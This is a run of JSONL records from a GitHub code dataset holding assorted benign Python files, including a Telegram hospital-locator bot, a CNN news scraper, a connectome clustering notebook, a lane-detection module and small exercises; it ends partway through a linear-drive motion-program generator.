face,box\r\n","repo_name":"grmos/Face-Recognition-for-Ar-smart-glasses-with-eye-tracker","sub_path":"face_alignment/align.py","file_name":"align.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28042167316","text":"import json\n\nwith open(\"all_idioms.json\", 'r', encoding='utf-8') as file:\n idioms = tuple(json.load(file))\n\nunique = []\nfor phrase in idioms:\n dicts = [sem['dictionary'] for sem in phrase['semantics'] if 'dictionary' in sem]\n if len(dicts) == len(set(dicts)) and len(set(dicts)) > 1:\n unique.append(phrase)\n\nprint(len(unique))\n\nwith open('idioms_in_dicts.json', 'w', encoding='utf8') as fp:\n json.dump(unique, fp, ensure_ascii=False, indent=4)\n","repo_name":"katearb/idioms","sub_path":"collection_processing/get_uniques.py","file_name":"get_uniques.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74807876966","text":"from aiogram.dispatcher.filters import Text, Command\nfrom aiogram.types import ReplyKeyboardMarkup, ReplyKeyboardRemove, Message\nfrom loader import dp, bot\nfrom keyboards.default.shahar_shifoxona import shaharShifo\nfrom keyboards.default.menuKeyboard import menuStart\nfrom states.locstates import locstates\nfrom aiogram.dispatcher import FSMContext\n\n@dp.message_handler(text=\"NAMANGAN SHAHAR BOLALAR SHIFOXONASI\", state=\"*\")\nasync def send_agronam(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAODY7PgeEPKVG4N8qJrUvtzKeEr1IkAArHAMRsTBKFJUYd2M-OcX7UBAAMCAAN4AAMtBA'\n \n text = \"NAMANGAN SHAHAR BOLALAR SHIFOXONASI\\n\"\n text += \"Manzil: Go'zal dahasi 4-uy\\n\"\n text += \"Mo'ljal: Go'zal shifoxonasi orqasida\\n Tel: +998 69 237 16 48, +998 69 237 10 43\\n\"\n text += \"Ish tartibi: 24/7\"\n \n await message.answer_location(latitude=\"41.00796883587812\", longitude=\" 71.62345267916557\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n \n@dp.message_handler(text=\"NAMANGAN VILOYATINING YUQUMLI 
KASALLIKLAR SHIFOXONASI\", state=\"*\")\nasync def send_sanoat(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAICAAFjs-3qLQJdT53wFPYrdcCIfihjvQACr8AxGxMEoUmGWODg3mWa9QEAAwIAA3gAAy0E'\n \n text = \"NAMANGAN VILOYATINING YUQUMLI KASALLIKLAR SHIFOXONASI\\n\"\n text += \"Manzil: K.Otamirzayev ko'chasi 90-uy\\n\"\n text += \"Mo'ljal: Doctor A xususiy klinikasi\\nTel: +998 69 224 73 58, +998 69 224 69 15\\n\"\n text += \"Ish tartibi: 24/7\"\n \n await message.answer_location(latitude=\"40.99052274911174\", longitude=\"71.70909736965017\") \n await message.reply_photo(file_id, caption=text)\n await state.finish() \n\n@dp.message_handler(text=\"RESPUBLIKA IXTISOSLASHTIRILGAN AKUSHERLIK VA GINEKOLOGIYA ILMIY - AMALIY TIBBIYOT MARKAZINING NAMANGAN FILIALI\", state=\"*\")\nasync def send_ipa(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAICAmOz7q-dEpQD7rziz3mm8QGvKNU1AAKuwDEbEwShSeMcnOf57i9tAQADAgADbQADLQQ'\n \n text = \"Respublika Ixtisoslashtirilgan Akusherlik va Ginekologiya Ilmiy-Amaliy Tibbiyot Markazi Namangan Filiali\\n\"\n text += \"Manzil: Boburshox ko'chasi 143A-uy\\n\"\n text += \"Mo'ljal: Yuqumli kasalliklar shifoxonasi\\nTel: +998 69 239 38 03\\n\"\n text += \"Ish tartibi: Dushanbadan-Jumagacha 07:00-19:00, tushliksiz\"\n \n await message.answer_location(latitude=\"40.99535848695003\", longitude=\"71.64694200841065\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"NAMANGAN VILOYAT KO'P TARMOQLI TIBBIYOT MARKAZI\", state=\"*\")\nasync def send_hamkor(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAIB5WOz7YyBRvHnmhfnFmWBPziix8dfAAKwwDEbEwShSZdycp0AASprrQEAAwIAA3kAAy0E'\n \n text = \"Namangan viloyat ko'p tarmoqli tibbiyot markazi\\n\"\n text += \"Manzil: Nomongoniy ko'chasi 9-uy\\n\"\n text += \"Mo'ljal: Sayhun mehmonxonasi\\nTel: +998 69 226 20 04, +998 69 226 36 00\\n\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 09:00-18:00, tushliksiz\"\n \n await message.answer_location(latitude=\"41.00393608604384\", longitude=\"71.66104554126807\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"ANGIOMED\", state=\"*\")\nasync def send_asaka(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAN2Y7PgdVeL6gVp1LM66BEMahkbETwAAqXAMRsTBKFJAAE8C2H-sFFjAQADAgADeAADLQQ'\n \n text = \"ANGIOMED\\n\"\n text += \"Manzil: I.Karimov ko'chasi\\nTel: +998 78 888 00 01\\n\"\n text += \"Mo'ljal: Namangan mehmonxonasi, NBU bank oldida\\n\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 09:00-18:00\"\n \n await message.answer_location(latitude=\"40.99625761004835\", longitude=\"71.58655921917563\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"Rano medical center\", state=\"*\")\nasync def send_infin(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAIByGOz7J_NiUUyyNEZGijae-brSbz1AALNwDEbEwShSZMcdoMKIv1ZAQADAgADeAADLQQ'\n \n text = \"Rano medical center\\n\"\n text += \"Manzil: I.Karimov ko'chasi\\nTel: +998 69 232 90 09\\n\"\n text += \"Mo'ljal: Al-mashriq oshxonasi yonida\\n\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 09:00-18:00\"\n \n await message.answer_location(latitude=\"40.99639110137484\", longitude=\"71.59026379416488\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"HABIB shifoxonasi\", state=\"*\")\nasync def send_trast(message:Message, state=FSMContext):\n \n file_id = 
'AgACAgIAAxkBAAIB42Oz7YNyr9cAAXVwRA9VTKHU55IVFQACz8AxGxMEoUlaoFyF8S2X-QEAAwIAA3gAAy0E'\n \n text = \"HABIB shifoxonasi\\n\"\n text += \"Manzil: Xotira ko'chasi 5-uy\\nTel: +998 90 555 52 25\\n\"\n text += \"Mo'ljal: 5-oila poliklinasi oldida\\n\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 09:00-17:00\"\n \n await message.answer_location(latitude=\"41.00063794372812\", longitude=\"71.61002748966733\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"5-oila poliklinasi\", state=\"*\")\nasync def send_mikro(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAIBxmOz69xtmNWu3EjITrxw_2v5-9-GAAKtwDEbEwShSVvGznXCO8VnAQADAgADeQADLQQ'\n \n text = \"5-oila poliklinasi\\n\"\n text += \"Manzil: Xotira ko'chasi 71A, 5A-kichik noxiya \\nTel: +998 69 232 50 71\\n\"\n text += \"Mo'ljal: Koson petak tarafda\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 08:00-20:00\"\n \n await message.answer_location(latitude=\"41.000552061203145\", longitude=\"71.61042198414846\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"Galomed\", state=\"*\")\nasync def send_ipak(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAANzY7PgdNYMb8q8Y-zz2tQDRv9AGJ4AAqTAMRsTBKFJTpIrB-oPCwQBAAMCAANtAAMtBA'\n \n text = \"Galomed\\n\"\n text += \"Manzil: 1-kichik noxiya, Sportchilar ko'chasi \\nTel: +998 95 307 00 70\\n\"\n text += \"Mo'ljal: 56-maktab oldida\\n\"\n text += \"Ish tartibi: Dushanbadan-Jumagacha 08:00-20:00\"\n \n await message.answer_location(latitude=\"41.003701653981\", longitude=\"71.59076202766865\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"\\\"ZZZ\\\" ko'z klinikasi\", state=\"*\")\nasync def send_nbu(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAMcY7PfV-iWrxClRzxhoJeO0c2UUQYAAo3AMRsTBKFJo0KrcOgQjmkBAAMCAAN5AAMtBA'\n \n text = \"\\\"ZZZ\\\" ko'z klinikasi\\n\"\n text += \"Manzil: 2-kichik noxiya \\n\"\n text += \"Mo'ljal: 1-shahar roddom, \\\"Navbahor\\\" stadioni \\nTel: +998 69 232 91 63\"\n text += \"Ish tartibi: Dushanbadan-Jumagacha 09:00-16:00, Shanba - 08:00-14:00\"\n \n await message.answer_location(latitude=\"41.000267811219075\", longitude=\"71.58959532489571\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n# @dp.message_handler(text=\"G'ishtli bolnitsa\", state=locstates.hospital)\n# async def send_nbu(message:Message, state=FSMContext):\n \n# file_id = ''\n \n# text = \"G'ishtli bolnitsa\\n\"\n# text += \"Manzil: 2-kichik noxiya\\n\"\n# text += \"Mo'ljal: \\\"ZZZ\\\" ko'z klinikasi oldida\\nTel: +998 -------\"\n# text += \"Ish tartibi: Dushanbadan-Shanbagacha 08:00-19:00\"\n \n# await message.answer_location(latitude=\"41.000591816121926\", longitude=\"71.5901996191277\") \n# await message.reply_photo(file_id, caption=text)\n# await state.finish()\n\n@dp.message_handler(text=\"👈 Ortga\", state=\"*\")\nasync def back_hos(message:Message, state=FSMContext):\n await message.answer(\"Ortga\", reply_markup=menuStart)\n await state.finish()\n\n","repo_name":"AzimjonNosirov/Bank-Bankomat-Shifoxona-Apteka-DXM-bot","sub_path":"handlers/users/hospitalHandler.py","file_name":"hospitalHandler.py","file_ext":"py","file_size_in_byte":7880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2418418881","text":"# 202203071358\n# https://leetcode-cn.com/problems/letter-case-permutation/\n# 给定一个字符串 s 
,通过将字符串 s 中的每个字母转变大小写,我们可以获得一个新的字符串。\n# 返回 所有可能得到的字符串集合 。以 任意顺序返回输出。\n# 例:\n# 输入:s = \"a1b2\"\n# 输出:[\"a1b2\", \"a1B2\", \"A1b2\", \"A1B2\"]\nfrom typing import List\n\n\nclass Solution:\n def letterCasePermutation(self, s: str) -> List[str]:\n res = []\n length = len(s)\n if not length:\n return [\"\"]\n\n def dfs(start, tmp):\n if start == length or len(tmp) == length:\n res.append(tmp)\n return\n if s[start].isdigit():\n dfs(start+1, tmp + s[start])\n elif s[start].islower():\n dfs(start+1, tmp + s[start])\n dfs(start+1, tmp + s[start].upper())\n elif s[start].isupper():\n dfs(start+1, tmp + s[start])\n dfs(start+1, tmp + s[start].lower())\n\n dfs(0, \"\")\n return res\n\n","repo_name":"alex-1q84/leetcode","sub_path":"python/src/leetcode/begin_algorithm/letter_case_permutation.py","file_name":"letter_case_permutation.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75293407528","text":"\n'''The break statement'''\n# ‘break’ is used to come out of the loop when encountered. It instructs the program to – Exit the loop now.\n\n'''Example:'''\n\nfor i in range(0, 80):\n\tprint(i)\t#This will print 0, 1, 2 and 3\n\tif i == 3:\n\t\tbreak\n\n\n\n\n# Difference between else and break\nfor i in range(10):\n\tprint(i)\n\tif i==5:\n\t\tbreak\nelse:\n\tprint(\"this is inside else of for\")\t#not printed this hence so you see the loop isnt breaking after exhaustion by loop rather from break used \n","repo_name":"fykaa/Just-Learning-Python","sub_path":"34_break statment.py","file_name":"34_break statment.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"31656529222","text":"import scrapy\nimport re\nimport os.path\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\nfrom scrapy.selector import HtmlXPathSelector\nfrom craigslist_sample.items import CNNItem\n\nclass MySpider(CrawlSpider):\n name = \"cnn\"\n allowed_domains = [\"cnn.com\"]\n start_urls = ['http://www.cnn.com/']\n \n base_url = 'http://www.cnn.com/sitemaps/sitemap-articles'\n year = ['2016','2015','2014','2013','2012','2011']\n month = ['12','11','10','09','08','07','06','05','04','03','02','01']\n \n def parse(self,response):\n for y in self.year:\n for m in self.month:\n url = self.base_url+'-'+y+'-'+m+'.xml'\n yield scrapy.Request(url,self.parseList)\n \n def parseList(self,response):\n nodename = 'loc'\n text = body_or_str(response)\n r = re.compile(r\"(<%s[\\s>])(.*?)()\" % (nodename, nodename), re.DOTALL)\n for match in r.finditer(text):\n url = match.group(2)\n yield scrapy.Request(url,self.parse_items)\n\n def parse_items(self, response):\n hxs = HtmlXPathSelector(response)\n items = []\n item = CNNItem()\n item[\"title\"] = hxs.select('//h1[@class=\"pg-headline\"]/text()').extract()\n item[\"article\"] = hxs.select('//div[@class=\"zn-body__paragraph\"]/text()').extract()\n item[\"link\"] = response.url\n items.append(item)\n splitUrl = response.url.split('/')\n year = splitUrl[3]\n month = splitUrl[4]\n day = splitUrl[5]\n name1 = item[\"title\"][0]\n name = \"\".join(re.findall(\"[a-zA-Z]+\", name1))\n article = \"\\n\".join(item['article'])\n save_path = os.path.join('data',year+\"-\"+month+\"-\"+day,name+\".txt\")\n if not os.path.exists(os.path.dirname(save_path)):\n try:\n os.makedirs(os.path.dirname(save_path))\n except OSError as exc: # Guard 
against race condition\n if exc.errno != errno.EEXIST:\n raise\n with open(save_path, 'a+') as f:\n f.write('name: {0} \\nlink: {1}\\n\\n {2}'.format(name, item['link'], article.encode('utf8')))\n return(items)\n","repo_name":"Helen-ChenHan/CNNnews","sub_path":"CNN/craigslist_sample/spiders/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3300730918","text":"# %% [markdown]\n# # THE MIND OF A MAGGOT\n\n# %% [markdown]\n# ## Imports\nimport os\nimport time\nimport warnings\n\nimport colorcet as cc\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.transforms as transforms\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom anytree import LevelOrderGroupIter, NodeMixin\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.linalg import orthogonal_procrustes\nfrom scipy.optimize import linear_sum_assignment\nfrom sklearn.exceptions import ConvergenceWarning\nfrom sklearn.metrics import adjusted_rand_score\nfrom sklearn.utils.testing import ignore_warnings\nfrom tqdm import tqdm\n\nimport pymaid\nfrom graspy.cluster import GaussianCluster\nfrom graspy.embed import AdjacencySpectralEmbed, LaplacianSpectralEmbed, selectSVD\nfrom graspy.models import DCSBMEstimator, RDPGEstimator, SBMEstimator\nfrom graspy.plot import heatmap, pairplot\nfrom graspy.simulations import rdpg\nfrom graspy.utils import augment_diagonal, binarize, pass_to_ranks\nfrom src.cluster import (\n MaggotCluster,\n add_connections,\n compute_pairedness_bipartite,\n crossval_cluster,\n fit_and_score,\n get_paired_inds,\n make_ellipses,\n plot_cluster_pairs,\n plot_metrics,\n predict,\n)\nfrom src.data import load_metagraph\nfrom src.graph import MetaGraph, preprocess\nfrom src.hierarchy import signal_flow\nfrom src.io import savecsv, savefig\nfrom src.pymaid import start_instance\nfrom src.visualization import (\n CLASS_COLOR_DICT,\n adjplot,\n barplot_text,\n gridmap,\n matrixplot,\n set_axes_equal,\n stacked_barplot,\n)\n\nwarnings.filterwarnings(action=\"ignore\", category=ConvergenceWarning)\n\nFNAME = os.path.basename(__file__)[:-3]\nprint(FNAME)\n\nrc_dict = {\n \"axes.spines.right\": False,\n \"axes.spines.top\": False,\n \"axes.formatter.limits\": (-3, 3),\n \"figure.figsize\": (6, 3),\n \"figure.dpi\": 100,\n}\nfor key, val in rc_dict.items():\n mpl.rcParams[key] = val\ncontext = sns.plotting_context(context=\"talk\", font_scale=1, rc=rc_dict)\nsns.set_context(context)\n\nPLOT_MODELS = True\n\nnp.random.seed(8888)\n\n\ndef stashfig(name, **kws):\n savefig(name, foldername=FNAME, save_on=True, **kws)\n\n\ndef stashcsv(df, name, **kws):\n savecsv(df, name)\n\n\n# %% [markdown]\n# ## Load data\n# In this case we are working with `G`, the directed graph formed by summing the edge\n# weights of the 4 different graph types. Preprocessing here includes removing\n# partially differentiated cells, and cutting out the lowest 5th percentile of nodes in\n# terms of their number of incident synapses. 5th percentile ~= 12 synapses. 
After this,\n# the largest connected component is used.\n\nmg = load_metagraph(\"G\", version=\"2020-04-01\")\nmg = preprocess(\n mg,\n threshold=0,\n sym_threshold=False,\n remove_pdiff=True,\n binarize=False,\n weight=\"weight\",\n)\nmeta = mg.meta\n\n# plot where we are cutting out nodes based on degree\ndegrees = mg.calculate_degrees()\nfig, ax = plt.subplots(1, 1, figsize=(5, 2.5))\nsns.distplot(np.log10(degrees[\"Total edgesum\"]), ax=ax)\nq = np.quantile(degrees[\"Total edgesum\"], 0.05)\nax.axvline(np.log10(q), linestyle=\"--\", color=\"r\")\nax.set_xlabel(\"log10(total synapses)\")\n\n# remove low degree neurons\nidx = meta[degrees[\"Total edgesum\"] > q].index\nmg = mg.reindex(idx, use_ids=True)\n\n# remove center neurons # FIXME\nidx = mg.meta[mg.meta[\"hemisphere\"].isin([\"L\", \"R\"])].index\nmg = mg.reindex(idx, use_ids=True)\n\nmg = mg.make_lcc()\nmg.calculate_degrees(inplace=True)\nmeta = mg.meta\n\nadj = mg.adj\nmeta[\"inds\"] = range(len(meta))\n\n# %% [markdown]\n# ##\n# param_grid = {\n# \"embed\": [\"ase\", \"unscaled_ase\", \"lse\"],\n# \"realign\": [True, False],\n# \"reembed\": [True, False],\n# \"metric\": [\"ARI\", \"bic\", \"lik\"],\n# }\nparam_grid = {\n \"embed\": [\"ase\"],\n \"realign\": [False],\n \"reembed\": [False],\n \"metric\": [\"bic\"],\n}\n\nfrom sklearn.model_selection import ParameterGrid\n\nparams = list(ParameterGrid(param_grid))\nn_levels = 7\n\nmcs = []\nfor p in params:\n metric = p[\"metric\"]\n embed = p[\"embed\"]\n realign = p[\"realign\"]\n reembed = p[\"reembed\"]\n basename = f\"-{p}\".replace(\" \", \"\")\n basename = basename.replace(\":\", \"=\")\n basename = basename.replace(\",\", \"-\")\n basename = basename.replace(\"'\", \"\")\n print(basename)\n\n np.random.seed(8888)\n\n mc = MaggotCluster(\n \"0\",\n adj=adj,\n meta=meta,\n n_init=25,\n stashfig=stashfig,\n min_clusters=2,\n max_clusters=3,\n n_components=4,\n embed=embed,\n realign=realign,\n reembed=reembed,\n )\n\n for i in range(n_levels):\n for j, node in enumerate(mc.get_lowest_level()):\n node.fit_candidates(plot_metrics=False)\n for j, node in enumerate(mc.get_lowest_level()):\n node.select_model(2, metric=metric)\n mc.collect_labels()\n\n fig, axs = plt.subplots(1, n_levels, figsize=(10 * n_levels, 30))\n for i in range(n_levels):\n ax = axs[i]\n stacked_barplot(\n mc.meta[f\"lvl{i}_labels_side\"],\n mc.meta[\"merge_class\"],\n category_order=np.unique(mc.meta[f\"lvl{i}_labels_side\"].values),\n color_dict=CLASS_COLOR_DICT,\n norm_bar_width=False,\n ax=ax,\n )\n ax.set_yticks([])\n ax.get_legend().remove()\n\n stashfig(f\"count-barplot-lvl{i}\" + basename)\n plt.close()\n\n fig, axs = plt.subplots(1, n_levels, figsize=(10 * n_levels, 30))\n for i in range(n_levels):\n ax = axs[i]\n stacked_barplot(\n mc.meta[f\"lvl{i}_labels_side\"],\n mc.meta[\"merge_class\"],\n category_order=np.unique(mc.meta[f\"lvl{i}_labels_side\"].values),\n color_dict=CLASS_COLOR_DICT,\n norm_bar_width=True,\n ax=ax,\n )\n ax.set_yticks([])\n ax.get_legend().remove()\n\n stashfig(f\"prop-barplot-lvl{i}\" + basename)\n plt.close()\n\n for i in range(n_levels):\n fig, ax = plt.subplots(1, 1, figsize=(20, 20))\n adjplot(\n adj,\n meta=mc.meta,\n sort_class=f\"lvl{i}_labels_side\",\n item_order=\"merge_class\",\n plot_type=\"scattermap\",\n sizes=(0.5, 1),\n ticks=False,\n colors=\"merge_class\",\n ax=ax,\n palette=CLASS_COLOR_DICT,\n gridline_kws=dict(linewidth=0.2, color=\"grey\", linestyle=\"--\"),\n )\n stashfig(f\"adj-lvl{i}\" + basename)\n\n mcs.append(mc)\n\n\n# %%\nnodes = 
mc.get_lowest_level()\ncounts = []\nfor n in nodes:\n print(len(n.meta))\n counts.append(len(n.meta))\ncounts = np.array(counts)\nbig = np.max(counts)\nbig_ind = np.where(counts == big)[0][0]\n\n# %% [markdown]\n# ##\nnode = nodes[big_ind]\n\n# get number that are paired\nnode.meta[node.meta[\"Pair\"].isin(node.meta.index)]\n# 52 / 215 have a pair here\n\n# get degrees\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.distplot(node.meta[\"Total edgesum\"], ax=ax)\nsns.distplot(meta[\"Total edgesum\"], ax=ax)\nstashfig(\"big-guy-edgesum-joint\")\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.distplot(node.meta[\"Total degree\"], ax=ax)\nsns.distplot(meta[\"Total degree\"], ax=ax)\nstashfig(\"big-guy-degree-joint\")\n\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.distplot(node.meta[\"Total edgesum\"], ax=ax)\nstashfig(\"big-guy-edgesum\")\n\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.distplot(node.meta[\"Total degree\"], ax=ax)\nstashfig(\"big-guy-degree\")\n\n# %% [markdown]\n# ##\nfrom src.visualization import plot_neurons\n\n\nstart_instance()\nkey = \"lvl6_labels\"\nfor tp in np.unique(mc.meta[key]):\n plot_neurons(mc.meta, key, tp)\n stashfig(f\"neurons-{key}-{tp}\")\n plt.close()\n\n","repo_name":"neurodata/maggot_models","sub_path":"notebooks/127.2-BDP-more-silly-model.py","file_name":"127.2-BDP-more-silly-model.py","file_ext":"py","file_size_in_byte":7618,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"30557319945","text":"import torch.nn as nn\nimport torch\nimport torch.nn.functional as F\n\n\nclass RESA(nn.Module):\n def __init__(self):\n super(RESA, self).__init__()\n self.iter = 5 # 5\n chan = 128 # 128\n fea_stride = 8 # 原图相对于此时的特征图大小的倍数\n self.height = 720 // fea_stride # 46\n self.width = 1280 // fea_stride # 80\n self.alpha = 2 # 2\n conv_stride = 9 # 9\n\n for i in range(self.iter):\n conv_vert1 = nn.Conv2d(chan, chan, (1, conv_stride),padding=(0, conv_stride//2), groups=1, bias=False)\n conv_vert2 = nn.Conv2d(chan, chan, (1, conv_stride),padding=(0, conv_stride//2), groups=1, bias=False)\n\n setattr(self, 'conv_d'+str(i), conv_vert1)\n setattr(self, 'conv_u'+str(i), conv_vert2)\n\n conv_hori1 = nn.Conv2d(chan, chan, (conv_stride, 1),padding=(conv_stride//2, 0), groups=1, bias=False)\n conv_hori2 = nn.Conv2d(chan, chan, (conv_stride, 1),padding=(conv_stride//2, 0), groups=1, bias=False)\n\n setattr(self, 'conv_r'+str(i), conv_hori1)\n setattr(self, 'conv_l'+str(i), conv_hori2)\n\n idx_d = (torch.arange(self.height) + self.height //2**(self.iter - i)) % self.height\n setattr(self, 'idx_d'+str(i), idx_d)\n\n idx_u = (torch.arange(self.height) - self.height //2**(self.iter - i)) % self.height\n setattr(self, 'idx_u'+str(i), idx_u)\n\n idx_r = (torch.arange(self.width) + self.width //2**(self.iter - i)) % self.width\n setattr(self, 'idx_r'+str(i), idx_r)\n\n idx_l = (torch.arange(self.width) - self.width //2**(self.iter - i)) % self.width\n setattr(self, 'idx_l'+str(i), idx_l)\n\n def forward(self, x):\n x = x.clone()\n\n for direction in ['d', 'u']:\n for i in range(self.iter):\n conv = getattr(self, 'conv_' + direction + str(i))\n idx = getattr(self, 'idx_' + direction + str(i))\n x.add_(self.alpha * F.relu(conv(x[..., idx, :])))\n\n for direction in ['r', 'l']:\n for i in range(self.iter):\n conv = getattr(self, 'conv_' + direction + str(i))\n idx = getattr(self, 'idx_' + direction + str(i))\n x.add_(self.alpha * F.relu(conv(x[..., idx])))\n\n return x\n\n\n\nif __name__ == \"__main__\":\n import 
torch\n img = torch.rand(1, 128, 90, 160).cuda()\n model = RESA().cuda()\n output = model(img)\n print(output.size)\n\n\n# fea torch.Size([4, 128, 46, 80])\n# resa torch.Size([4, 128, 46, 80])\n# seg torch.Size([4, 7, 368, 640])\n# exist torch.Size([4, 6])\n","repo_name":"033186ZSY/RLSNet-master","sub_path":"rlsnet/resa.py","file_name":"resa.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"416421459","text":"import os\nimport click\nfrom PyInquirer import prompt\n\nfrom distutils.dir_util import copy_tree, remove_tree\nfrom malas_path import config_path, malas_path\n\nquestions = [\n # Learn more in https://github.com/CITGuru/PyInquirer#question-types\n {\n 'type': 'confirm',\n 'name': 'confirmation',\n 'message': 'Configuration already exist, reset to factory?',\n 'default': True\n },\n {\n 'type': 'confirm',\n 'name': 'keep_config',\n 'message': 'Keep config?',\n 'default': True\n },\n\n]\n\n@click.command()\ndef initial():\n \"\"\"\n Initialize folder and other\n \"\"\"\n replace = True\n keep_config = False\n\n if os.path.isdir(config_path):\n answer = prompt(questions)\n replace = answer.get('confirmation')\n keep_config = answer.get('keep_config')\n\n if replace:\n if os.path.isdir(f'{config_path}/config'):\n copy_tree(src=f'{config_path}/config', dst=f'{config_path}/config_backup')\n remove_tree(f'{config_path}/config')\n\n folders = ['config', 'plugins']\n for folder in folders:\n os.makedirs(f'{config_path}/{folder}', exist_ok=True)\n\n copy_tree(src=f'{malas_path}/malas_config/', dst=config_path)\n\n if keep_config:\n copy_tree(src=f'{config_path}/config_backup', dst=f'{config_path}/config')\n remove_tree(f'{config_path}/config_backup')\n\n click.echo(f\"Creating configuration folder in {config_path}\")\n else:\n click.echo(\"Nothing change\")\n","repo_name":"tegarimansyah/malas-cli","sub_path":"malas-cli/malas_init.py","file_name":"malas_init.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16506645697","text":"def diccionario_geringoso(listaDePalabras):\n diccionario={}\n for cadena in listaDePalabras:\n cadenaFinal=''\n for c in cadena:\n cadenaFinal+=c\n if c=='a':\n cadenaFinal+= 'pa'\n elif c=='e':\n cadenaFinal+= 'pe'\n elif c=='i':\n cadenaFinal+= 'pi'\n elif c=='o':\n cadenaFinal+= 'po'\n elif c=='u':\n cadenaFinal+= 'pu'\n \n diccionario[cadena]=cadenaFinal\n return diccionario \n\nlista=['banana', 'manzana', 'mandarina']\nprint(diccionario_geringoso(lista))\n","repo_name":"CristianAmici/python","sub_path":"clase02/diccionario_geringoso.py","file_name":"diccionario_geringoso.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2186468294","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\na, b = map(int, input().split())\r\nc, d = map(int, input().split())\r\nprime = [1] * 1001\r\n\r\nfor i in range(2, int((1000)**0.5)+1):\r\n if prime[i] == 1:\r\n for j in range(i+i, 1001, i):\r\n prime[j] = 0\r\n\r\nif b >= c:\r\n tmp = sum(prime[c:b+1])\r\nelse:\r\n tmp = 0\r\n\r\nyt = sum(prime[a:b+1]) - tmp\r\nyj = sum(prime[c:d+1]) - tmp\r\n\r\nif tmp % 2 == 0:\r\n if yt > yj:\r\n print(\"yt\")\r\n else:\r\n print(\"yj\")\r\nelse:\r\n if yt >= yj:\r\n print(\"yt\")\r\n else:\r\n print(\"yj\")","repo_name":"rloldl-c/algorithm","sub_path":"백준/Silver/25632. 
소수 부르기 게임/소수 부르기 게임.py","file_name":"소수 부르기 게임.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14859459098","text":"import math\nfrom technosoftlineardrive.tml import *\nimport struct\n\nSERVO_DEFAULT_ACCELERATION = 0.1751 # IU\nSERVO_DEFAULT_SPEED = 31.831 # IU\n\nMAX_ACCELERATION = 0.3 # IU\nMAX_SPEED = 170 # IU\n\n# Here be some dragons. Kind and friendly dragons, but dragons nonetheless.\n\ndef create_linear_drive_program(pos_amount,\n acceleration=SERVO_DEFAULT_ACCELERATION,\n speed=SERVO_DEFAULT_SPEED):\n \"\"\"\n Create a assembly tml program for the linear drive.\n \n :param pos_amount: amount to move linear drives position relatively.\n :param acceleration: how fast the linear drive will accelerate to it's desired speed.\n :param speed: how fast the linear drive will move to desired position.\n :return assemble_program: a complete assembly program to run on the linear drive.\n \"\"\"\n assert (acceleration <= MAX_ACCELERATION)\n assert (speed <= MAX_SPEED)\n\n def pack_int(num):\n \"\"\"\n Pack a integer to a struct for using in serial communication.\n \n :param num: integer to pack.\n :return num: as a packed integer for use in serial communication. \n \"\"\"\n return struct.unpack(\"HH\", struct.pack(\"i\", num))\n\n def to_fixed_point(num):\n \"\"\"\n Pack a number to a fixed point type and pack it as a 